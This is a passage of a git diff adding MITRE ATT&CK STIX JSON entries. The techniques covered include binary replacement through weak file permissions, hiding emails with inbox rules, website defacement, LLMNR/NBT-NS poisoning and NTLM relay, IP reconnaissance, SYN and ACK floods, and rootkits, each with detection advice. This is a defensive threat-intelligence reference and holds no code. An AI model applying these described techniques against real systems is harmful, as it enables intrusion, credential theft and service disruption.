"https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/", + "description": "Kugler, R. (2012, November 20). Mozilla Foundation Security Advisory 2012-98. Retrieved March 10, 2017.", + "source_name": "Mozilla Firefox Installer DLL Hijack" + }, + { + "url": "http://seclists.org/fulldisclosure/2015/Dec/34", + "description": "Kanthak, S. (2015, December 8). Executable installers are vulnerable^WEVIL (case 7): 7z*.exe\tallows remote code execution with escalation of privilege. Retrieved March 10, 2017.", + "source_name": "Seclists Kanthak 7zip Installer" + } + ], + "modified": "2020-03-19T15:11:39.627Z", + "name": "File System Permissions Weakness", + "description": "Processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.\n\n### Services\n\nManipulation of Windows service binaries is one variation of this technique. Adversaries may replace a legitimate service executable with their own executable to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Once the service is started, either directly by the user (if appropriate access is available) or through some other means, such as a system restart if the service starts on bootup, the replaced executable will run instead of the original service executable.\n\n### Executable Installers\n\nAnother variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088). Several examples of this weakness in existing common installers have been reported to software vendors. (Citation: Mozilla Firefox Installer DLL Hijack) (Citation: Seclists Kanthak 7zip Installer)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "x_mitre_effective_permissions": [ + "SYSTEM", + "User", + "Administrator" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff.json new file mode 100644 index 0000000000000000000000000000000000000000..8e680fe26bac2568a3bed404e9a82a45c9e3fb99 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff.json @@ -0,0 +1,93 @@ +{ + "type": "bundle", + "id": "bundle--65b1e352-5477-4c07-b04e-a2155897c182", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-12T20:42:20.079Z", + "name": "Email Hiding Rules", + "description": "Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)\n\nAdversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.\n\nAny user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)\n\nIn some environments, administrators may be able to enable email rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to automatically modify or delete all emails related to specific topics (such as internal security incident notifications).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_contributors": [ + "Dor Edry, Microsoft", + "Liran Ravich, CardinalOps" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor email clients and applications for suspicious activity, such as missing messages or abnormal configuration and/or log entries.\n\nOn Windows systems, monitor for creation of suspicious inbox rules through the use of the New-InboxRule and Set-InboxRule PowerShell cmdlets.(Citation: Microsoft BEC Campaign) On MacOS systems, monitor for modifications to the RulesActiveState.plist, SyncedRules.plist, UnsyncedRules.plist, and MessageRules.plist files.(Citation: MacOS Email Rules)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Windows", + "Office 365", + "Linux", + "macOS", + "Google Workspace" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Application Log: Application Log Content", + "File: File Modification" + ], + "type": "attack-pattern", + "id": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff", + "created": "2021-06-07T13:20:23.767Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1564/008", + "external_id": "T1564.008" + }, + { + "source_name": "MacOS Email Rules", + "description": "Apple. (n.d.). Use rules to manage emails you receive in Mail on Mac. Retrieved June 14, 2021.", + "url": "https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac" + }, + { + "source_name": "Microsoft BEC Campaign", + "description": "Carr, N., Sellmer, S. (2021, June 14). Behind the scenes of business email compromise: Using cross-domain threat data to disrupt a large BEC campaign. Retrieved June 15, 2021.", + "url": "https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/" + }, + { + "source_name": "Microsoft Mail Flow Rules 2023", + "description": "Microsoft. (2023, February 22). Mail flow rules (transport rules) in Exchange Online. Retrieved March 13, 2023.", + "url": "https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules" + }, + { + "source_name": "Microsoft Inbox Rules", + "description": "Microsoft. (n.d.). Manage email messages by using rules. Retrieved June 11, 2021.", + "url": "https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59" + }, + { + "source_name": "Microsoft New-InboxRule", + "description": "Microsoft. (n.d.). New-InboxRule. Retrieved June 7, 2021.", + "url": "https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps" + }, + { + "source_name": "Microsoft Set-InboxRule", + "description": "Microsoft. (n.d.). Set-InboxRule. Retrieved June 7, 2021.", + "url": "https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps" + }, + { + "source_name": "Microsoft Cloud App Security", + "description": "Niv Goldenberg. (2018, December 12). Rule your inbox with Microsoft Cloud App Security. Retrieved June 7, 2021.", + "url": "https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3.json new file mode 100644 index 0000000000000000000000000000000000000000..b16775670d01717e765450572e235fda81bd3152 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3.json @@ -0,0 +1,74 @@ +{ + "type": "bundle", + "id": "bundle--3baabc4b-746a-452d-bf27-6146a667be97", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows", + "IaaS", + "Linux", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3", + "type": "attack-pattern", + "created": "2020-02-20T14:34:08.496Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1491.002", + "url": "https://attack.mitre.org/techniques/T1491/002" + }, + { + "source_name": "FireEye Cyber Threats to Media Industries", + "url": "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/ib-entertainment.pdf", + "description": "FireEye. (n.d.). Retrieved April 19, 2019." + }, + { + "source_name": "Kevin Mandia Statement to US Senate Committee on Intelligence", + "url": "https://www.intelligence.senate.gov/sites/default/files/documents/os-kmandia-033017.pdf", + "description": "Kevin Mandia. (2017, March 30). Prepared Statement of Kevin Mandia, CEO of FireEye, Inc. before the United States Senate Select Committee on Intelligence. Retrieved April 19, 2019." + }, + { + "source_name": "Anonymous Hackers Deface Russian Govt Site", + "url": "https://torrentfreak.com/anonymous-hackers-deface-russian-govt-site-to-protest-web-blocking-nsfw-180512/", + "description": "Andy. (2018, May 12). \u2018Anonymous\u2019 Hackers Deface Russian Govt. Site to Protest Web-Blocking (NSFW). Retrieved April 19, 2019." + }, + { + "source_name": "Trend Micro Deep Dive Into Defacement", + "url": "https://documents.trendmicro.com/assets/white_papers/wp-a-deep-dive-into-defacement.pdf", + "description": "Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019." + } + ], + "modified": "2022-03-25T19:34:37.539Z", + "name": "External Defacement", + "description": "An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. [External Defacement](https://attack.mitre.org/techniques/T1491/002) may ultimately cause users to distrust the systems and to question/discredit the system\u2019s integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_detection": "Monitor external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "File: File Creation", + "Application Log: Application Log Content", + "File: File Modification" + ], + "x_mitre_impact_type": [ + "Integrity" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0.json new file mode 100644 index 0000000000000000000000000000000000000000..f4e1a5b8ea4ecf998339b6bfbd03cecf41944d9d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0.json @@ -0,0 +1,95 @@ +{ + "type": "bundle", + "id": "bundle--447580ea-aa6b-41e7-a918-2b2915445070", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Eric Kuehn, Secure Ideas", + "Matthew Demaske, Adaptforward" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0", + "type": "attack-pattern", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1171", + "url": "https://attack.mitre.org/techniques/T1171" + }, + { + "url": "https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution", + "description": "Wikipedia. (2016, July 7). Link-Local Multicast Name Resolution. Retrieved November 17, 2017.", + "source_name": "Wikipedia LLMNR" + }, + { + "url": "https://technet.microsoft.com/library/cc958811.aspx", + "description": "Microsoft. (n.d.). NetBIOS Name Resolution. Retrieved November 17, 2017.", + "source_name": "TechNet NetBIOS" + }, + { + "source_name": "byt3bl33d3r NTLM Relaying", + "url": "https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html", + "description": "Salvati, M. (2017, June 2). Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes). Retrieved February 7, 2019." + }, + { + "source_name": "Secure Ideas SMB Relay", + "url": "https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html", + "description": "Kuehn, E. (2018, April 11). Ever Run a Relay? Why SMB Relays Should Be On Your Mind. Retrieved February 7, 2019." + }, + { + "url": "https://github.com/nomex/nbnspoof", + "description": "Nomex. (2014, February 7). NBNSpoof. Retrieved November 17, 2017.", + "source_name": "GitHub NBNSpoof" + }, + { + "url": "https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response", + "description": "Francois, R. (n.d.). LLMNR Spoofer. Retrieved November 17, 2017.", + "source_name": "Rapid7 LLMNR Spoofer" + }, + { + "url": "https://github.com/SpiderLabs/Responder", + "description": "Gaffie, L. (2016, August 25). Responder. Retrieved November 17, 2017.", + "source_name": "GitHub Responder" + }, + { + "url": "https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning", + "description": "Sternstein, J. (2013, November). Local Network Attacks: LLMNR and NBT-NS Poisoning. Retrieved November 17, 2017.", + "source_name": "Sternsecurity LLMNR-NBTNS" + }, + { + "url": "https://github.com/Kevin-Robertson/Conveigh", + "description": "Robertson, K. (2016, August 28). Conveigh. Retrieved November 17, 2017.", + "source_name": "GitHub Conveigh" + } + ], + "modified": "2020-02-11T19:09:48.452Z", + "name": "LLMNR/NBT-NS Poisoning and Relay", + "description": "Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)\n\nAdversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)\n\nSeveral tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_detection": "Monitor HKLM\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient for changes to the \"EnableMulticast\" DWORD value. A value of \u201c0\u201d indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)\n\nMonitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.\n\nDeploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)", + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0dda99f0-4701-48ca-9774-8504922e92d3.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0dda99f0-4701-48ca-9774-8504922e92d3.json new file mode 100644 index 0000000000000000000000000000000000000000..4a6512a5539538cdec2b7adb122676dc7657de6b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0dda99f0-4701-48ca-9774-8504922e92d3.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--e9bc6f78-a0c3-497c-9f6a-b9c936e91825", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0dda99f0-4701-48ca-9774-8504922e92d3", + "type": "attack-pattern", + "created": "2020-10-02T15:59:11.695Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1590.005", + "url": "https://attack.mitre.org/techniques/T1590/005" + }, + { + "source_name": "WHOIS", + "url": "https://www.whois.net/", + "description": "NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020." + }, + { + "source_name": "DNS Dumpster", + "url": "https://dnsdumpster.com/", + "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020." + }, + { + "source_name": "Circl Passive DNS", + "url": "https://www.circl.lu/services/passive-dns/", + "description": "CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020." + } + ], + "modified": "2021-04-15T03:31:05.302Z", + "name": "IP Addresses", + "description": "Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7.json new file mode 100644 index 0000000000000000000000000000000000000000..74a61d374576afc2bccb45505dd60893d0659e97 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7.json @@ -0,0 +1,75 @@ +{ + "type": "bundle", + "id": "bundle--b0da6e45-e3c2-4027-b995-69e52adbe67d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:51.289Z", + "name": "OS Exhaustion Flood", + "description": "Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.\n\nDifferent ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood)\n\nACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Sensor Health: Host Status", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "id": "attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7", + "created": "2020-02-20T15:27:18.581Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1499/001", + "external_id": "T1499.001" + }, + { + "source_name": "Cisco DoSdetectNetflow", + "description": "Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf" + }, + { + "source_name": "Cloudflare SynFlood", + "description": "Cloudflare. (n.d.). What is a SYN flood attack?. Retrieved April 22, 2019.", + "url": "https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/" + }, + { + "source_name": "Corero SYN-ACKflood", + "description": "Corero. (n.d.). What is a SYN-ACK Flood Attack?. Retrieved April 22, 2019.", + "url": "https://www.corero.com/resources/ddos-attack-types/syn-flood-ack.html" + }, + { + "source_name": "Arbor AnnualDoSreport Jan 2018", + "description": "Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide Infrastructure Security Report. Retrieved April 22, 2019.", + "url": "https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b.json new file mode 100644 index 0000000000000000000000000000000000000000..95e0444006a1a15c386dff053db47b08404c2f96 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b.json @@ -0,0 +1,80 @@ +{ + "type": "bundle", + "id": "bundle--53a33f3a-09b5-4db4-a9d4-2cf99be79908", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:50.568Z", + "name": "Rootkit", + "description": "Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) \n\nRootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia Rootkit)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "File: File Modification", + "Drive: Drive Modification", + "Firmware: Firmware Modification" + ], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "File Monitoring", + "Host Intrusion Prevention Systems", + "Application Control", + "Signature-based Detection", + "System Access Controls" + ], + "type": "attack-pattern", + "id": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", + "created": "2017-05-31T21:30:26.496Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1014", + "external_id": "T1014" + }, + { + "source_name": "CrowdStrike Linux Rootkit", + "description": "Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017.", + "url": "https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/" + }, + { + "source_name": "BlackHat Mac OSX Rootkit", + "description": "Pan, M., Tsai, S. (2014). You can\u2019t see me: A Mac OS X Rootkit uses the tricks you haven't known yet. Retrieved December 21, 2017.", + "url": "http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf" + 